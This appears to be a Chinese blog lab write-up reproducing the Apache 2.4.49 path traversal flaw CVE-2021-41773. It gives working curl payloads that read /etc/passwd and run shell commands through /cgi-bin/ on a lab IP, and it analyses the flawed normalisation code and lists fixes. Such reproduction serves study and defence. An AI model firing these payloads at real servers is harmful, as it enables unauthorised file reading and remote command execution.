中间件漏洞 | Apache-路径穿越/任意命令执行

已于 2022-11-02 20:32:50 修改
阅读量1.3k 收藏 4
点赞数
分类专栏: 中间件漏洞 文章标签: apache 中间件 服务器
于 2022-11-02 20:28:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52116519/article/details/127540169
版权

文章目录

前置知识

cgi和cgi应用程序

公共网关接口(Common Gateway Interface,CGI)是一个Web服务器主机提供信息服务的标准接口(可以想象成银行提供服务的柜台窗口)。通过CGI接口,Web服务器就能够获取客户端提交的信息,转交给服务器端的CGI程序进行处理,最后返回结果给客户端。简单的说,cgi就是一个接口。
CGI 应用程序能与浏览器进行交互,还可通过数据API与数据库服务器等外部数据源进行通信,从数据库服务器中获取数据。格式化为HTML文档后,发送给浏览器,也可以将从浏览器获得的数据放到数据库中。
在这里插入图片描述

curl命令

curl 是常用的命令行工具,用来请求 Web 服务器。curl是客户端(client)的URL工具的意思。

–path-as-is

可以使curl完全按照URL中提供的路径发送,而不删除任何点段。

-d或–data

用于发送 POST 请求的数据体。

-v

输出通信的整个过程,用于调试。

在这里插入图片描述

靶场:CVE-2021-41773

1 靶场介绍

Apache HTTP Server 2.4.49 路径穿越漏洞
Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:

  • 版本等于2.4.49
  • 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的)

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令

2 漏洞验证:路径穿越

  1. 编译及运行

    docker-compose build
docker-compose up -d

    在这里插入图片描述

  2. 环境启动后,访问http://your-ip:8080即可看到Apache默认的It works!页面。
    在这里插入图片描述

  3. 使用如下CURL命令来发送Payload(注意其中的/icons/必须是一个存在且可访问的目录)

    curl -v --path-as-is http://20.210.90.167:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
// 这里可以使用.%2e也可以使用%2e%2e

url解码后
curl -v --path-as-is http://20.210.90.167:8080/icons/../../../../etc/passwd

  4. 成功读取到/etc/passwd,说明存在路径穿越。
    在这里插入图片描述在这里插入图片描述

  5. 漏洞原理
    Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径做过滤的时候没有过滤干净。
    函数原理:遍历路径字符串,对每一位,先进行url解码,然后检测当前位和下一位的组合是不是..

    AP_DECLARE(int) ap_normalize_path(char *path, unsigned int flags)
{

 	......
 	
    // 遍历路径字符串,一边做url解码一边检测 '..',出现漏洞。
    while (path[l] != '\0') {
        // 这一段是在做URL解码,检测到当前位为‘%’,接下来两位为十六进制数字就进入if
        if ((flags & AP_NORMALIZE_DECODE_UNRESERVED) && path[l] == '%' && apr_isxdigit(path[l + 1]) && apr_isxdigit(path[l + 2])) {
            const char c = x2c(&path[l + 1]); // 将url编码转换为字符(16进制转char)
            if (apr_isalnum(c) || (c && strchr("-._~", c))) {
                l += 2;
                path[l] = c;
            }
        }
        
		......
		
        // 如果path[0]不是斜杠,且不是* 或者空串,w就会置为0。
        if (w == 0 || IS_SLASH(path[w - 1])) {
			
			......
			
            //如果检测到点号
            if (path[l] == '.') {
                if (IS_SLASH_OR_NUL(path[l + 1])) {
                    l++;
                    if (path[l]) {
                        l++;
                    }
                    continue;
                }
                // 如果点号的下一个还是点号,就要删一点了
                if (path[l + 1] == '.' && IS_SLASH_OR_NUL(path[l + 2])) {
                    if (w > 1) {
                        do {
                            w--;
                        } while (w && !IS_SLASH(path[w - 1]));
                    }
                    else {
                        if (flags & AP_NORMALIZE_NOT_ABOVE_ROOT) {
                            ret = 0;
                        }
                    }
                    l += 2;
                    if (path[l]) {
                        l++;
                    }
                    continue;
                }
            }
        }
        path[w++] = path[l++];
    }
    path[w] = '\0';
    return ret;
}
3 漏洞利用:任意命令执行
  1. 在服务端开启了cgi或cgid这两个mod的情况下,使用命令行工具利用路径穿越漏洞将可以执行任意命令
    curl -v --data "echo;id" http://20.210.90.167:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
    在这里插入图片描述
    curl -v --data "echo;whoami" http://20.210.90.167:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
    在这里插入图片描述
    curl -v --data "echo;ls /" http://20.210.90.167:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
    在这里插入图片描述
  2. 小问题:多输入单引号
    在这里插入图片描述
  3. 使用抓包工具
    在这里插入图片描述
4 修复
  1. 升级更新
  2. 关闭目录遍历功能
  3. 关闭cgi模式
c4fx
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java开源包1
06-28
SpeechLion 是一个语音识别程序,主要用来处理桌面命令,基于 Sphinx-4 语音识别引擎开发。用户可以通过该软件来控制 Linux 桌面,例如打开google搜索、鼠标点击、下一窗口、打开帮助、静音等操作。 Java发送短信包...
java开源包10
06-28
SpeechLion 是一个语音识别程序,主要用来处理桌面命令,基于 Sphinx-4 语音识别引擎开发。用户可以通过该软件来控制 Linux 桌面,例如打开google搜索、鼠标点击、下一窗口、打开帮助、静音等操作。 Java发送短信包...
路径穿越(Path Traversal)详解
热门推荐
12-06 1万+
本文主要是对路径穿越漏洞进行学习总结,本身这个漏洞也并不常见,主要是多产生于php的程序。这种类型的攻击强制访问文件、目录、 以及位于 Web 文档根目录之外的命令 或 CGI 根目录。常用来其他读取、写入类漏洞结合。我个人给这种漏洞形成的原因可以分为两类 错误配置由于带有中间代理转发性质的功能配置错误程序本身代码存在问题这一点十分好理解,就是代码写的有问题,逻辑简单,没有验证。第一类:文件类参数请求参数似乎包含文件或目录名称的,例如include=main.inc或template=/en/sidebar
修复路径穿越任意文件写入漏洞
InterestAndFun的博客
02-23 7128
前段时间随手写的一个文件上传服务,在公司的渗透测试下漏洞百出,其中少不了路径穿越任意文件写入漏洞。其实这两个漏洞的修复并不复杂,只要对入参进行两个条件的校验就可以了。
目录遍历漏洞
最新发布
qq_68163788的博客
05-22 1296
目录遍历漏洞(Directory Traversal Vulnerability),也称为路径遍历漏洞,是指攻击者可以在没有得到授权的情况下,访问服务器上的敏感文件或目录,甚至可以直接获取服务器的控制权。 目录遍历漏洞的原理是利用Web应用程序中对用户输入数据的不完全过滤和验证,攻击者可以构造特定的URL请求,通过在URL中添加../等符号,来访问系统中的其他目录或文件。例如,攻击者可以通过以下URL访问系统中的敏感文件:http://www.example.com/index.php?page=../
Apache HTTP Server路径穿越漏洞复现(CVE-2021-41773)
小小猪的博客
10-26 3031
sudo docker pull blueteamsteve/cve-2021-41773:no-cgid sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Apache HTTP Server 路径穿越漏洞
qq_53008544的博客
05-01 1387
发现对 Apache HTTP 服务器 2.4.50 中的 CVE-2021-41773 的修复不足。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果还为这些别名路径启用了 CGI 脚本,则可能允许远程执行代码。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不会影响早期版本。
路径穿越基础介绍
the_biggest_baby的博客
12-26 1901
路径穿越,path-traversal,也称为路径遍历、目录穿越/遍历(directory traversal),是一种能让攻击者通过使用一些类似../的目录控制序列访问 web 服务器上任意文件的安全漏洞。程序源码和数据服务端证书敏感的系统文件,path-traversal 被 OWASP 收录的 Broken Access Control(BAC,越权访问)一栏,BAC 可是2021 版中的 No.1 哦。
java开源包11
06-28
SpeechLion 是一个语音识别程序,主要用来处理桌面命令,基于 Sphinx-4 语音识别引擎开发。用户可以通过该软件来控制 Linux 桌面,例如打开google搜索、鼠标点击、下一窗口、打开帮助、静音等操作。 Java发送短信包...
java开源包2
06-28
SpeechLion 是一个语音识别程序,主要用来处理桌面命令,基于 Sphinx-4 语音识别引擎开发。用户可以通过该软件来控制 Linux 桌面,例如打开google搜索、鼠标点击、下一窗口、打开帮助、静音等操作。 Java发送短信包...
Java资源包01
08-31
SpeechLion 是一个语音识别程序,主要用来处理桌面命令,基于 Sphinx-4 语音识别引擎开发。用户可以通过该软件来控制 Linux 桌面,例如打开google搜索、鼠标点击、下一窗口、打开帮助、静音等操作。 Java发送短信包...
路径穿越漏洞二三事
wanxu_pursue的专栏
07-22 545
介绍下路径穿越漏洞的概念、复现与处理。
web其它漏洞
buffedon的博客
07-15 710
SSRF及其它漏洞1. SSRF 服务器请求伪造漏洞成因漏洞原理危害Weblogic ssrf漏洞2. Http拆分攻击/CRLF注入原理危害3. 会话固定攻击流程4. 路径穿越漏洞防御window下的常见敏感路径文件:linux下的常见敏感路径文件:5. 服务器远程部署漏洞6. 编辑器漏洞 1. SSRF 服务器请求伪造 漏洞成因 很多web应用都提供了从其他服务器上获取数据的功能。使用指定的URL,web应用可以获取图片,下载文件,读取文件内容等 这个功能被恶意利用,攻击者可以利用这些web应用作为代理
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3106
ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
路径穿越/遍历
qq_61779683的博客
02-13 3103
前提知识: 相对于正常输入的,目录/文件名这类,/../在路径也是有效的,不过它有点独特,发挥返回上一层目录的作用。因此,在知道目录有几层的情况下,就可以通过相对应层数的/../来返回到根目录,借此来实现任意文件的访问 一般操作: 使用案例:buuctf[第二章 web进阶]文件上传 前后两次白名单检查,即使是上传成功,不在白名单里面也会被删除 那就不上传到这个目录,去别的目录,查一下代码看层数 $dir = 'upload/'; $temp_dir = $dir.md5(
Apache两个解析漏洞复现及防御方法
阿道夫的博客
01-28 3302
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
Apache Log4j 远程代码执行漏洞批量检测工具
保持微笑的博客
01-10 3018
漏洞描述 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。 影响版本 Apache Log4j 2.x < 2.15.0-rc2 影响范围 含有该漏洞的Log4j影响到超过 6000个中间件或应用,目前已知的可能受影响的应用及组件包括但不限于如下清单中所列出的: Sp...
Apache 2.4.49 路径穿越漏洞复现 ( CVE-2021-41773 )
qq_45396375的博客
01-04 566
在Apache HTTP Server 2.4.49版本中存在一处路径穿越漏洞(CVE-2021-41773)如果配置了Require all granted,远程攻击者可以使用路径遍历攻击访问易受攻击的Web服务器上文档根目录以外的任意文件;如果Apache HTTP Server 2.4.49开启了CGI,攻击者还可构造恶意请求实现远程代码执行
路径穿越攻击路径整理
weixin_34389926的博客
06-21 9563
../../../WEB-INF/web.xml 转载于:https://www.cnblogs.com/AtesetEnginner/p/11064279.html

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值